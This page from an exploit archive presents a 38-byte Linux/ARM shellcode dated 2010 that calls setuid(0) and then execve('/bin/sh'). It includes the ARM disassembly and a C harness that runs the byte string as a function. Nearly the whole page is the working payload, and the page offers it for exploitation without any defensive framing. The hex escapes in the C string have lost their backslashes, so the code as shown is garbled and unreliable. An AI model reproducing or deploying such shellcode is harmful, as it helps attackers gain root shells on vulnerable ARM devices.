[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux/ARM - setuid(0) & execve("/bin/sh","/bin/sh",0) - 38 bytes
# Published : 2010-06-29
# Author : Jonathan Salwan
# Previous Title : Linux/ARM - setuid(0) & kill(-1, SIGKILL) - 28 bytes
# Next Title : Linux/ARM - execve("/bin/sh","/bin/sh",0) - 30 bytes
/*
Title: Linux/ARM - setuid(0) & execve("/bin/sh","/bin/sh",0) - 38 bytes
Date: 2010-06-29
Tested: ARM926EJ-S rev 5 (v5l)
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/shell_storm
! Dtabase of shellcodes http://www.shell-storm.org/shellcode/
8054: e28f3001 add r3, pc, #1 ; 0x1
8058: e12fff13 bx r3
805c: 1b24 subs r4, r4, r4
805e: 1c20 adds r0, r4, #0
8060: 2717 movs r7, #23
8062: df01 svc 1
8064: 4678 mov r0, pc
8066: 300a adds r0, #10
8068: 9001 str r0, [sp, #4]
806a: a901 add r1, sp, #4
806c: 1a92 subs r2, r2, r2
806e: 270b movs r7, #11
8070: df01 svc 1
8072: 2f2f cmp r7, #47
8074: 6962 ldr r2, [r4, #20]
8076: 2f6e cmp r7, #110
8078: 6873 ldr r3, [r6, #4]
*/
#include <stdio.h>
char *SC = "x01x30x8fxe2"
"x13xffx2fxe1"
"x24x1bx20x1c"
"x17x27x01xdf"
"x78x46x0ax30"
"x01x90x01xa9"
"x92x1ax0bx27"
"x01xdfx2fx2f"
"x62x69x6ex2f"
"x73x68";
int main(void)
{
fprintf(stdout,"Length: %dn",strlen(SC));
(*(void(*)()) SC)();
return 0;
}